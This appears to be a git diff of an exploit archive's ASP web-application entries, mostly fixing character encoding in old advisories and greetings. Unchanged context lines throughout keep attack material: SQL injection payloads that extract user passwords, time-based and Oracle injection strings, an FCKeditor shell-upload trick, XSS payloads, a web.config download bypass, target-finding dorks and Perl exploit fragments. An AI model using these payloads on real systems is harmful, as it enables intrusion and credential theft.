Français v.(9.4 Ubuntu) | # Bug : Backup Dump ====================== Exploit By indoushka ================================= # Exploit : diff --git a/platforms/asp/webapps/12471.txt b/platforms/asp/webapps/12471.txt index cd8b374ed..114a978c9 100755 --- a/platforms/asp/webapps/12471.txt +++ b/platforms/asp/webapps/12471.txt @@ -7,7 +7,7 @@ -------------------------------------------------------------------------------------- #####################Sid3^effects aKa HaRi################################## #Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors] -#Thanks:*L0rd rusAdr*,d4rk-blu,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR +#Thanks:*L0rd ÇrusAdêr*,d4rk-blu™®,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR #ShouTZ:kedar,dec0d3r,41.w4r10r #Catch us at www.andhrahackers.com or www.teamicw.in ############################################################################ @@ -75,8 +75,8 @@ DEMO : TO change the admin login details and other info.. - - +   +   diff --git a/platforms/asp/webapps/12478.txt b/platforms/asp/webapps/12478.txt index c5789c912..b3b008a8c 100755 --- a/platforms/asp/webapps/12478.txt +++ b/platforms/asp/webapps/12478.txt @@ -1,38 +1,38 @@ ============================================================================== - [] ~ Note : LionTurk.Turkblog.com Resmi Web Sitem :D + [»] ~ Note : LionTurk.Turkblog.com Resmi Web Sitem :D ============================================================================== - []Mesut Manet Haber V1.0 Auth Bypass Vulnerability + [»]Mesut Manþet Haber V1.0 Auth Bypass Vulnerability ============================================================================== - [] Script: [ Mesut Manet Haber V1.0 ] - [] Language: [ ASP ] - [] Download: [ http://www.aspindir.com/goster/5377] - [] Founder: [ LionTurk - Bylionturk@kafam1milyon.com - LionTurk.Turkblog.com } - [] My Home: [ RevengeHack.com & Ar-ge.Org ] - [] N0T3 : Yeni Aciklarimi Bekleyin. + [»] Script: [ Mesut Manþet Haber V1.0 ] + [»] Language: [ ASP ] + [»] Download: [ http://www.aspindir.com/goster/5377] + [»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com - LionTurk.Turkblog.com } + [»] My Home: [ RevengeHack.com & Ar-ge.Org ] + [»] N0T3 : Yeni Aciklarimi Bekleyin. ########################################################################### ===[ Exploit And Dork ]=== - [] http://lionturk.turkblog.com/[dizin]/admin/admin_haber.asp or + [»] http://lionturk.turkblog.com/[dizin]/admin/admin_haber.asp or /admin/admin_haber.asp?islem=ekle_kaydet - n the Admin panel + Ýn the Admin panel - [] Mesut Manet Haber + [»] Mesut Manþet Haber Author: LionTurk <- - Turk'uz Varmi Otesi? - Dandirik Scriptler Kullanmayn. + Dandirik Scriptler Kullanmayýn. ########################################################################### diff --git a/platforms/asp/webapps/12527.txt b/platforms/asp/webapps/12527.txt index a577fa13a..3b1d4e7bc 100755 --- a/platforms/asp/webapps/12527.txt +++ b/platforms/asp/webapps/12527.txt @@ -12,7 +12,7 @@ ** Risk : High -** Dork : "Diseo Web Hernest Consulting S.L." +** Dork : "Diseño Web Hernest Consulting S.L." ************************************************************ diff --git a/platforms/asp/webapps/12571.txt b/platforms/asp/webapps/12571.txt index ce541c5c9..6cfe03a10 100755 --- a/platforms/asp/webapps/12571.txt +++ b/platforms/asp/webapps/12571.txt @@ -28,12 +28,12 @@ http://localhost/[path]/controlpanel/ ------------------------------------------------------------------------------------------- -yle bir zlemişim ki seni -Artık dnsen de olur dnmesen de +Öyle bir özlemişim ki seni +Artık dönsen de olur dönmesen de Ben her daim yine sana sitemli yine sana hasret giderim Aziz yar sen bir sabah bu şehri başıma yıkıp gittin -Dağları deviriverdin stme hi ekinmedin -Ben bu şehirde bir daha da sabah grmedim -Gnaydınlar olmadı gnler aymadı sensiz ........ +Dağları deviriverdin üstüme hiç çekinmedin +Ben bu şehirde bir daha da sabah görmedim +Günaydınlar olmadı günler aymadı sensiz ........ ------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/12693.txt b/platforms/asp/webapps/12693.txt index 2f33aaf53..e0edb7123 100755 --- a/platforms/asp/webapps/12693.txt +++ b/platforms/asp/webapps/12693.txt @@ -25,5 +25,5 @@ ** ** Greetz to : ALLAH ** All Members of http://www.DZ4All.cOm/Cc -** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & T O X ! N & n2n & +** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & T O X ! N £ & n2n & *********************************************************** diff --git a/platforms/asp/webapps/12701.txt b/platforms/asp/webapps/12701.txt index 2fe0cbc3a..d979d248f 100755 --- a/platforms/asp/webapps/12701.txt +++ b/platforms/asp/webapps/12701.txt @@ -5,7 +5,7 @@ ** Home : N/A ** Vunlerability : SQL Injection ** Risk : High -** Dork : "Sitedesign by: Dieleman www.dieleman.nl - Copyright 2010" +** Dork : "Sitedesign by: Dieleman www.dieleman.nl - Copyright © 2010" ************************************************************ ** Discovred by: Ra3cH ** From : Algeria diff --git a/platforms/asp/webapps/13789.txt b/platforms/asp/webapps/13789.txt index 88d595ddd..ca8a6b391 100755 --- a/platforms/asp/webapps/13789.txt +++ b/platforms/asp/webapps/13789.txt @@ -14,7 +14,7 @@ greetz to :All ICW members. ############################################################################################################### Description: -Looking for a Real Estate Listing script? Our Virtual Real Estate Manager was developed in ASP ( Active Server Pages ) and an Access database. End User Features : Search by Area and type of property Listings Page includes thumbnail of the property, Short Description, city, date added and price. Details Page includes - 4 thumbnails that open in a new window with larger view. Heading, Description of the property, Details of the property, email to a friend and request more info. Admin Features : Add, Edit and Delete Properties - upload images Add, Edit and Delete Categories Add, Edit and Delete Area Change Password VRM : Is delivered via a ZIP file. You receive this exact template with the application. Easy to customize with knowledge of html or one of the following: Design Requirements : Front page - Recommended * Macromedia Dreamweaver Configuration Requirements: Notepad WordPad +Looking for a Real Estate Listing script? Our Virtual Real Estate Manager was developed in ASP ( Active Server Pages ) and an Access database. End User Features : » Search by Area and type of property » Listings Page includes thumbnail of the property, Short Description, city, date added and price. » Details Page includes - 4 thumbnails that open in a new window with larger view. Heading, Description of the property, Details of the property, email to a friend and request more info. Admin Features : » Add, Edit and Delete Properties - upload images » Add, Edit and Delete Categories » Add, Edit and Delete Area » Change Password VRM : Is delivered via a ZIP file. You receive this exact template with the application. Easy to customize with knowledge of html or one of the following: Design Requirements : Front page - Recommended * Macromedia Dreamweaver Configuration Requirements: Notepad WordPad ############################################################################################################### diff --git a/platforms/asp/webapps/13793.txt b/platforms/asp/webapps/13793.txt index 0e01bec86..c9fea41f6 100755 --- a/platforms/asp/webapps/13793.txt +++ b/platforms/asp/webapps/13793.txt @@ -4,7 +4,7 @@ Version:1.0 Price:$149.97 Vendor url:http://dmxready.com/?product=online-notebook-manager Published: 2010-06-09 -Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r and to all ICW members +Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue™®, S1ayer,d3c0d3r and to all ICW members ############################################################################################################################################################################################### Online Notebook Manager SQLi Vulnerability diff --git a/platforms/asp/webapps/13842.txt b/platforms/asp/webapps/13842.txt index 533620fad..0b6eaf153 100755 --- a/platforms/asp/webapps/13842.txt +++ b/platforms/asp/webapps/13842.txt @@ -33,14 +33,14 @@ Spl Greetz to:inj3ct0r.com Team Description: VU Web Visitor Analyst is an application that retrieves your website -visitors IP address, visited date and time, visited page name, the link a +visitors’ IP address, visited date and time, visited page name, the link a visitor came from originally (referred URL address). You can view the single visitor history with the list of all pages visited. You can also display visits by date criteria. The weekly statistics allow you to see the total visits for every single day in the present and last weeks. The monthly statistics allow you viewing the total visits of every month for the whole year. In addition, every visitor is linked to the web database containing -personal information about this visitors IP address (such as name, address, +personal information about this visitor’s IP address (such as name, address, phone, email, etc. if available). Pleasant and professional graphic user interface will make your statistical experience more enjoyable. diff --git a/platforms/asp/webapps/13891.html b/platforms/asp/webapps/13891.html index 0e36253af..c4aafbca6 100755 --- a/platforms/asp/webapps/13891.html +++ b/platforms/asp/webapps/13891.html @@ -22,8 +22,8 @@ Sex

Avatar :

-

-

+

 

+

 

diff --git a/platforms/asp/webapps/14030.pl b/platforms/asp/webapps/14030.pl index e9e870c15..079ea595d 100755 --- a/platforms/asp/webapps/14030.pl +++ b/platforms/asp/webapps/14030.pl @@ -54,7 +54,7 @@ $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET=>$target.$file.$shellsite.'?&'.$shellcmd.'='.$cmd) or die("\n\n Failed to connect."); $res = $xpl->request($req); $r = $res->content; -$r =~ tr/[\n]/[]/; +$r =~ tr/[\n]/[ê]/; if (@ARGV[4] eq "-r") { diff --git a/platforms/asp/webapps/14155.txt b/platforms/asp/webapps/14155.txt index cd4ae8ffd..c405b7850 100755 --- a/platforms/asp/webapps/14155.txt +++ b/platforms/asp/webapps/14155.txt @@ -20,7 +20,7 @@ http://address/Portal/Research/ResearchPlan/UserStart.aspx 'or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))-- ==================================================================================== -Dork: just search for "????" +Dork: just search for "سیدا" ==================================================================================== ~Blackout Frenzy [http://b0f.ir] diff --git a/platforms/asp/webapps/14461.txt b/platforms/asp/webapps/14461.txt index 68b4b0b27..d97919b34 100755 --- a/platforms/asp/webapps/14461.txt +++ b/platforms/asp/webapps/14461.txt @@ -1,5 +1,5 @@ =================================================== -AKY Blog SQL ?njection +AKY Blog SQL İnjection =================================================== Author : Madconfig diff --git a/platforms/asp/webapps/14870.txt b/platforms/asp/webapps/14870.txt index 1ff2302ad..aa3efd044 100755 --- a/platforms/asp/webapps/14870.txt +++ b/platforms/asp/webapps/14870.txt @@ -149,7 +149,7 @@ As a result you can input value for Bypass filters and access critical informati After that results will be shown in DataGrid in Page. -With another value, we can retrieve Informations of Users: +With another value, we can retrieve Information’s of Users: AddExtraSQL:1=1/**/Union/**/s;e;l;e;c;t/**/Name,Password,Email,UserID,2,Salt,1/1/1900,3,user,NEWID(),user/**/f;r;o;m/**/rb_users;-;-/**/sp_password diff --git a/platforms/asp/webapps/15185.txt b/platforms/asp/webapps/15185.txt index ca983faa7..fbee694f9 100755 --- a/platforms/asp/webapps/15185.txt +++ b/platforms/asp/webapps/15185.txt @@ -3,7 +3,7 @@ http://cloudscan.blogspot.com/2010/10/vendor-smartertoolscom-smartermail-7x.html ######################################################################## # Vendor: smartertools.com SmarterMail 7.x (7.2.3925) # Date: 2010-10-01 -# Author : David Hoyt (sqlhacker) Hoyt LLC +# Author : David Hoyt (sqlhacker) – Hoyt LLC # Contact : h02332@gmail.com # Home : http://cloudscan.me # Dork : insite: SmarterMail Enterprise 7.1 diff --git a/platforms/asp/webapps/15189.txt b/platforms/asp/webapps/15189.txt index b6acf6e7e..1ec1e132a 100755 --- a/platforms/asp/webapps/15189.txt +++ b/platforms/asp/webapps/15189.txt @@ -1,7 +1,7 @@ ######################################################################## # Vendor: smartertools.com SmarterMail 7.x (7.2.3925) # Date: 2010-10-01 -# Author : David Hoyt (sqlhacker) Hoyt LLC +# Author : David Hoyt (sqlhacker) – Hoyt LLC # Contact : h02332@gmail.com # Home : http://cloudscan.me # Dork : insite: SmarterMail Enterprise 7.2 diff --git a/platforms/asp/webapps/15191.txt b/platforms/asp/webapps/15191.txt index 845e04742..90cb8ccbf 100755 --- a/platforms/asp/webapps/15191.txt +++ b/platforms/asp/webapps/15191.txt @@ -10,7 +10,7 @@ TradeMC E-Ticaret - (SQLi/XSS) Multiple Vulnerabilities ~Web App. : TradeMC E-Ticaret ~Software: http://www.trademc.net/ ~Vulnerability Style : SQL-i (XSS) Multiple -~Google Keywords : "TradeMC Tarafndan Hazrlanmtr" +~Google Keywords : "TradeMC Tarafýndan Hazýrlanmýþtýr" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Meterials : SQLInjection TOOL or Table name Bruteforcer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ diff --git a/platforms/asp/webapps/15448.txt b/platforms/asp/webapps/15448.txt index d650e22d3..5b04f6a9c 100755 --- a/platforms/asp/webapps/15448.txt +++ b/platforms/asp/webapps/15448.txt @@ -8,7 +8,7 @@ # EDB-ID: 5765 (only 1 SQL injection) -# Ariko-Security: Security Audits , Audyt bezpiecze?stwa +# Ariko-Security: Security Audits , Audyt bezpieczeństwa # Advisory: 745/2010 ============ { Ariko-Security - Advisory #1/11/2010 } ============= diff --git a/platforms/asp/webapps/15597.txt b/platforms/asp/webapps/15597.txt index b7c55ce73..30c52a58e 100755 --- a/platforms/asp/webapps/15597.txt +++ b/platforms/asp/webapps/15597.txt @@ -1,26 +1,26 @@ ============================================================================== - [] Acidcat CMS v 3.3 (fckeditor) Shell Upload Vulnerability + [»] Acidcat CMS v 3.3 (fckeditor) Shell Upload Vulnerability ============================================================================== - [] Title : [ Acidcat CMS v 3.x (fckeditor) Shell Upload Vulnerability ] + [»] Title : [ Acidcat CMS v 3.x (fckeditor) Shell Upload Vulnerability ] - [] Script : [ Mini-NUKE v2.3 ] + [»] Script : [ Mini-NUKE v2.3 ] - [] Language: [ ASP ] + [»] Language: [ ASP ] - [] Download: [ http://www.acidcat.com/default.asp?itemID=202&itemTitle=Download Free] + [»] Download: [ http://www.acidcat.com/default.asp?itemID=202&itemTitle=Download Free] - [] Author : [ Net.Edit0r - black.hat.tm@gmail.com } + [»] Author : [ Net.Edit0r - black.hat.tm@gmail.com } - [] My Home : [ ajaxtm.com and datacoders.org ] + [»] My Home : [ ajaxtm.com and datacoders.org ] - [] Date : [ 2010-11-23 ] + [»] Date : [ 2010-11-23 ] - [] Version : [ 3.3.X and 3.2.x ] + [»] Version : [ 3.3.X and 3.2.x ] - [] Dork : [ "Powered by Acidcat CMS " ] + [»] Dork : [ "Powered by Acidcat CMS " ] @@ -30,15 +30,15 @@ ===[ Exploit ]=== - [] http://server/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/asp/connector.asp + [»] http://server/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/asp/connector.asp - [] asp renamed via the .asp;.jpg (shell.asp;.jpg) + [»] asp renamed via the .asp;.jpg (shell.asp;.jpg) ===[ Upload To ]=== - [] http://server/read_write/file/[Shell] + [»] http://server/read_write/file/[Shell] - [] http://server/public/File/[Shell] + [»] http://server/public/File/[Shell] Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , Skitt3r , M4hd1 diff --git a/platforms/asp/webapps/15653.txt b/platforms/asp/webapps/15653.txt index 7b586dff4..a8fcd1494 100755 --- a/platforms/asp/webapps/15653.txt +++ b/platforms/asp/webapps/15653.txt @@ -57,7 +57,7 @@ files of the BugTracker.NET: 6. *Credits* -This vulnerability was discovered and researched by Damin Saura +This vulnerability was discovered and researched by Damián Saura [http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=researcher&name=Damian_Saura] and Alejandro Frydman from Core Security Technologies. diff --git a/platforms/asp/webapps/15688.txt b/platforms/asp/webapps/15688.txt index f50bc72bf..20e5bc477 100755 --- a/platforms/asp/webapps/15688.txt +++ b/platforms/asp/webapps/15688.txt @@ -3,7 +3,7 @@ # Date: 05-12-2010 # Vendor or Software Link: http://www.hotwebscripts.co.uk/ # Category:WebApp -# Price: £150 +# Price: £150 # Contact: R4dc0re@yahoo.fr # Website: www.1337db.com # Greetings to: R0073r(1337db.com), L0rd CrusAd3r,Sid3^effects and to rest of the 1337db members diff --git a/platforms/asp/webapps/15777.txt b/platforms/asp/webapps/15777.txt index bc807881f..b87c770a9 100755 --- a/platforms/asp/webapps/15777.txt +++ b/platforms/asp/webapps/15777.txt @@ -8,16 +8,16 @@ +Tests : Windows XP SP 3 and Backtrack4 any other OS +Discovered by DeadLy DeMon + Cyber - Warrior TIM =>> *www.cyber-warrior.org* -+Greetz to All System-Hacker, BlackApple , F0RTYS3V3N , HUNT3R , ?air-ul ++Greetz to All System-Hacker, BlackApple , F0RTYS3V3N , HUNT3R , Şair-ul Cihad and All KinqSqlZCrew Members --------------------------------------------------------------------------------------- -Var m? iinizde beni tan?yan? -Ya?anmadan zlemeyen s?r benim. -Kalmasada ?hretimi duymayan, -Kimli?imi tarif etmek zor benim.. - Akl?n?za Geliriz Akl?n?z Gider... +Var mı içinizde beni tanıyan? +Yaşanmadan çözülemeyen sır benim. +Kalmasada şöhretimi duymayan, +Kimliğimi tarif etmek zor benim.. + Aklınıza Geliriz Aklınız Gider... KinqSqlZ Crew Akar... ---------------------------------------------------------------------------------------- diff --git a/platforms/asp/webapps/1700.pl b/platforms/asp/webapps/1700.pl index 57bf047ae..377b7841e 100755 --- a/platforms/asp/webapps/1700.pl +++ b/platforms/asp/webapps/1700.pl @@ -45,7 +45,7 @@ sub exploit () print $as "Connection: close\n\n"; print "- Connected...\r\n"; while ($answer = <$as>) { - if ($answer =~ /class=\"tablo_baslik\"> (.*?)<\/b><\/td>/) { + if ($answer =~ /class=\"tablo_baslik\">» (.*?)<\/b><\/td>/) { if ($1 == $ARGV[2]) { print "- Exploit succeed! Getting USERID: $ARGV[2]'s credentials\r\n"; } diff --git a/platforms/asp/webapps/17011.txt b/platforms/asp/webapps/17011.txt index 00c322921..b4d2a291d 100755 --- a/platforms/asp/webapps/17011.txt +++ b/platforms/asp/webapps/17011.txt @@ -12,7 +12,7 @@ - Soroush Dalili (Irsdl [at] yahoo [dot] com) (secproject.com) # Description: -Regarding attack technique [1], it is possible to bypass the security protections of ?/download.aspx? in Douran Portal and download the hosted files. +Regarding attack technique [1], it is possible to bypass the security protections of “/download.aspx” in Douran Portal and download the hosted files. # PoC(s): Try this first and see the access denied error: http://[HOST]/download.aspx?FilePathAttach=/&FileNameAttach=web.config&OriginalAttachFileName=secretfile.txt @@ -22,7 +22,7 @@ http://[HOST]/download.aspx?FilePathAttach=/&FileNameAttach=web.config%20&Origin http://[HOST]/download.aspx?FilePathAttach=/&FileNameAttach=wEB.CoNfiG&OriginalAttachFileName=secretfile.txt # Reference: -[1] Unrestricted File Download V1.0 ? Windows Server, (URL: http://soroush.secproject.com/blog/2011/01/unrestricted_file_download_v1_0/) +[1] Unrestricted File Download V1.0 – Windows Server, (URL: http://soroush.secproject.com/blog/2011/01/unrestricted_file_download_v1_0/) # Important Notes: - Vendor did not respond to the email as well as the phone. As there is not any contact form or email address in the website, we have used all the emails which had been found by searching in Google such as support, info, and so on. diff --git a/platforms/asp/webapps/17015.txt b/platforms/asp/webapps/17015.txt index a95c1920f..9aa2165cc 100755 --- a/platforms/asp/webapps/17015.txt +++ b/platforms/asp/webapps/17015.txt @@ -7,7 +7,7 @@ # Software Link: http://www.element-it.com/downloadfile.aspx?type=pow # Demo: http://site.com/Examples/PowUpload/Simpleupload.htm - +  [Comment] Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion, Login-Root, KikoArg, Ricota, diff --git a/platforms/asp/webapps/17016.txt b/platforms/asp/webapps/17016.txt index 90a90989d..758a0eee9 100755 --- a/platforms/asp/webapps/17016.txt +++ b/platforms/asp/webapps/17016.txt @@ -6,7 +6,7 @@ # Software: EAFlashUpload v 2.5 # Software Link: http://www.easyalgo.com/downloads.aspx#EAFlashUpload # Demo: http://www.site.com/examples/eaflashupload/simpleupload.aspx - +  [Comment] Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion, Login-Root, KikoArg, Ricota, diff --git a/platforms/asp/webapps/17242.txt b/platforms/asp/webapps/17242.txt index 209a12100..400120330 100755 --- a/platforms/asp/webapps/17242.txt +++ b/platforms/asp/webapps/17242.txt @@ -27,7 +27,7 @@ e-mail : root[at]exploit-id.com # Category:: webapps # Google dork: http://www.google.com/#q=intext%3A%22Powered+by+dhtml-menu-builder.com%22+inurl%3A.asp%3Fid%3D&hl=en&biw=1280&bih=709&prmd=ivns&ei=xES_TdTxI4-58gPk_ozUBQ&start=20&sa=N&fp=4fb1180a34b58d1d #Vendor: http://dhtml-menu-builder.com -# Tested on: [Windows Vista Edition Intgrale] +# Tested on: [Windows Vista Edition Intégrale] #### ||>> Special Thanks To: All Exploit-Id Team diff --git a/platforms/asp/webapps/17711.txt b/platforms/asp/webapps/17711.txt index cae53c075..8bb5876ac 100755 --- a/platforms/asp/webapps/17711.txt +++ b/platforms/asp/webapps/17711.txt @@ -7,13 +7,13 @@ ############################################## ===[ POC ]=== -[] http://website/[path]/careers-detail.asp?id=[SQL] +[»] http://website/[path]/careers-detail.asp?id=[SQL] -[] http://website/[path]/publications.asp?type=[SQL] +[»] http://website/[path]/publications.asp?type=[SQL] -[] http://website/[path]/WhatNew.asp?page=&id=[SQL] +[»] http://website/[path]/WhatNew.asp?page=&id=[SQL] -[] http://website/[path]/gallery.asp?cid=[SQL] +[»] http://website/[path]/gallery.asp?cid=[SQL] ############################################## Greats T0 : diff --git a/platforms/asp/webapps/17733.txt b/platforms/asp/webapps/17733.txt index b9941345f..e6fde8aff 100755 --- a/platforms/asp/webapps/17733.txt +++ b/platforms/asp/webapps/17733.txt @@ -65,12 +65,12 @@ http://[URL]/archive.aspx?sid=19'; IF SYSTEM_USER='sa' waitfor delay '00:00:10'--&siteid=1 Binary Search Exploits: -http://[URL]/about.aspx?siteid=1'; IF ASCII(SUBSTRING((?),i,1)) > k +http://[URL]/about.aspx?siteid=1'; IF ASCII(SUBSTRING((�),i,1)) > k waitfor delay '00:00:10'-- Note: In last POC, i is the i-th byte returned by the one-row subquery -(?) and k is the +(�) and k is the current middle value of the binary search. ------------- diff --git a/platforms/asp/webapps/1834.asp b/platforms/asp/webapps/1834.asp index f4514ac40..38def82d0 100755 --- a/platforms/asp/webapps/1834.asp +++ b/platforms/asp/webapps/1834.asp @@ -23,15 +23,15 @@ http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28% TURKISH # Ba.l.k : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities -# Szck[Arama] : "powered by phpmydirectory" -# A... Bulan : ajann -# A.k bulunan dosyalar; +# Sözcük[Arama] : "powered by phpmydirectory" +# Aç... Bulan : ajann +# Aç.k bulunan dosyalar; SQL INJECT.ON-------------------------------------------------------- ### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ ### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=De.i.ken -rnek: +Örnek: http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users XSS-------------------------------------------------------- @@ -39,7 +39,7 @@ XSS-------------------------------------------------------- ### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ ### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ -rnek: +Örnek: http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyar.s. c.kar.cakt.r. Ac.klama: diff --git a/platforms/asp/webapps/1837.pl b/platforms/asp/webapps/1837.pl index d57c734c5..ac1541c77 100755 --- a/platforms/asp/webapps/1837.pl +++ b/platforms/asp/webapps/1837.pl @@ -55,7 +55,7 @@ sub getsession () print "- Connected...\r\n"; while ($answer = <$mns>) { if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mncookie = $mncookie.$1; } - if ($answer =~ /Gvenlik Kodunuz<\/td>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); } + if ($answer =~ /Güvenlik Kodunuz<\/td>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); } } #if you are here... die "- Exploit failed\r\n"; @@ -191,7 +191,7 @@ sub doadmin () print "- You can login with password $mnpass on $mnlreq\r\n"; exit(); } - if ($answer =~ /yeler Aktr/) { + if ($answer =~ /Üyeler Açýktýr/) { print "- Exploit failed\r\n"; exit(); } diff --git a/platforms/asp/webapps/1849.htm b/platforms/asp/webapps/1849.htm index aeb3b7f97..079583459 100755 --- a/platforms/asp/webapps/1849.htm +++ b/platforms/asp/webapps/1849.htm @@ -17,10 +17,10 @@ Mail mail@domain.com
User -d +Ýd : - Example: d:1 + Example: Ýd:1 Admin
User Country : diff --git a/platforms/asp/webapps/18802.txt b/platforms/asp/webapps/18802.txt index dccb67e49..007f77711 100755 --- a/platforms/asp/webapps/18802.txt +++ b/platforms/asp/webapps/18802.txt @@ -16,16 +16,16 @@ VL-ID: Introduction: ============= -XPhone Unified Communications 2011 ist die leistungsstrkste Telefonie- und Kommunikationslsung von C4B. -Sie ist leicht zu bedienen und verbessert die Arbeitsablufe in Unternehmen. Die Lsung integriert sich +XPhone Unified Communications 2011 ist die leistungsstärkste Telefonie- und Kommunikationslösung von C4B. +Sie ist leicht zu bedienen und verbessert die Arbeitsabläufe in Unternehmen. Die Lösung integriert sich nahtlos in bestehende Anwendungen und nutzt die vorhandene Telefonanlage und IT-Infrastruktur. Dabei werden die verschiedensten Kommunikationsmittel wie Telefon, Handy, Fax, Voicemail, SMS und Instant Messaging -vereint und mit Prsenzinformationen kombiniert. Die Software stellt leistungsfhige Telefonie-Funktionen in +vereint und mit Präsenzinformationen kombiniert. Die Software stellt leistungsfähige Telefonie-Funktionen in praktisch allen Anwendungen wie z.B. Microsoft Outlook, Lotus Notes, Warenwirtschaftssystemen (ERP), -Kundendatenbanken (CRM) oder dem Webbrowser zur Verfgung. Die Verknpfung von Telefonereignissen mit bestimmten +Kundendatenbanken (CRM) oder dem Webbrowser zur Verfügung. Die Verknüpfung von Telefonereignissen mit bestimmten Aktionen, z.B. Starten von Anwendungen, automatische Erstellung von Briefen oder Faxe u.v.m, verbessert die -Arbeitsablufe in Unternehmen sprbar. +Arbeitsabläufe in Unternehmen spürbar. (Copy of the Vendor Homepage: http://www.c4b.de ) @@ -106,7 +106,7 @@ may not apply. Any modified copy or reproduction, including partially usages, of Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. -Copyright 2012 Vulnerability-Lab +Copyright © 2012 Vulnerability-Lab -- VULNERABILITY RESEARCH LABORATORY TEAM diff --git a/platforms/asp/webapps/1900.txt b/platforms/asp/webapps/1900.txt index 94240f0d9..e298df0d3 100755 --- a/platforms/asp/webapps/1900.txt +++ b/platforms/asp/webapps/1900.txt @@ -3,13 +3,13 @@ #Original advisory: http://www.nukedx.com/?viewdoc=42 #Title: MaxiSepet <= 1.0 (link) SQL Injection Vulnerability. -#Dork: "Copyright MaxiSepet " +#Dork: "Copyright MaxiSepet ©" #How: Parameter link did not sanitized properly. #Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=SQL -#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('ye%20adi:%20',email,'
','ifre:%20',sifre,'')+from+uye+ORDER BY email ASC +#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('Üye%20adi:%20',email,'
','Þifre:%20',sifre,'')+from+uye+ORDER BY email ASC # nukedx.com [2006-06-11] diff --git a/platforms/asp/webapps/21272.txt b/platforms/asp/webapps/21272.txt index dc9cd1457..d8586e01a 100755 --- a/platforms/asp/webapps/21272.txt +++ b/platforms/asp/webapps/21272.txt @@ -150,7 +150,7 @@ retrieve users credential from user database requests \\\ .------. /// (:::::::)(_)():- - `------ \\\ + `------° \\\ Exploit sent /// '."\n"; diff --git a/platforms/asp/webapps/23005.txt b/platforms/asp/webapps/23005.txt index 3963ff575..966be1d80 100755 --- a/platforms/asp/webapps/23005.txt +++ b/platforms/asp/webapps/23005.txt @@ -13,10 +13,10 @@ the protection and upload a file with any extension. Note: Quick patch for FCKEditor 2.6.8 File Upload Bypass: -In config.asp, wherever you have: +In “config.asp”, wherever you have: - ConfigAllowedExtensions.Add File,Extensions Here + ConfigAllowedExtensions.Add “File”,”Extensions Here” Change it to: - ConfigAllowedExtensions.Add File,^(Extensions Here)$ + ConfigAllowedExtensions.Add “File”,”^(Extensions Here)$” diff --git a/platforms/asp/webapps/2306.txt b/platforms/asp/webapps/2306.txt index 1f992d2df..a435881d1 100755 --- a/platforms/asp/webapps/2306.txt +++ b/platforms/asp/webapps/2306.txt @@ -1,6 +1,6 @@ ################################################################################ ## ## -## ZIXForum 1.12 <= "RepId" Remote SQL Injection ## +## ©ZIXForum 1.12 <= "RepId" Remote SQL Injection ## ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## ## Credit by | Chironex Fleckeri ## ## Mail | ChironeX.FleckeriX@Gmail.Com ## diff --git a/platforms/asp/webapps/23696.pl b/platforms/asp/webapps/23696.pl index 5c6f9df50..a096b87e9 100755 --- a/platforms/asp/webapps/23696.pl +++ b/platforms/asp/webapps/23696.pl @@ -31,7 +31,7 @@ print "| |\n"; print "| PROOF OF CONCEPT COOKIE ACCOUNT HIJACK |\n"; print "| Usage:Asp-POC.pl [host] [directorio] [usuario] [fichero] |\n"; print "| |\n"; -print "| By: Manuel L?pez #IST |\n"; +print "| By: Manuel L�pez #IST |\n"; print "|____________________________________________________________|\n"; print "\n\n"; exit(1); diff --git a/platforms/asp/webapps/2592.htm b/platforms/asp/webapps/2592.htm index 03f32f249..b6f19860b 100755 --- a/platforms/asp/webapps/2592.htm +++ b/platforms/asp/webapps/2592.htm @@ -1,8 +1,8 @@ diff --git a/platforms/asp/webapps/2642.asp b/platforms/asp/webapps/2642.asp index 9e56b71f7..322fe599c 100755 --- a/platforms/asp/webapps/2642.asp +++ b/platforms/asp/webapps/2642.asp @@ -10,7 +10,7 @@ '[Author : ajann '[Contact : :( '[ExploitName: exploit1.asp -'[Greetz To: ## Tm Mslman Aleminin Ramazan Bayrami MUBAREK Olsun , Bir Daha Nasib Olur nsallah ## +'[Greetz To: ## Tüm Müslüman Aleminin 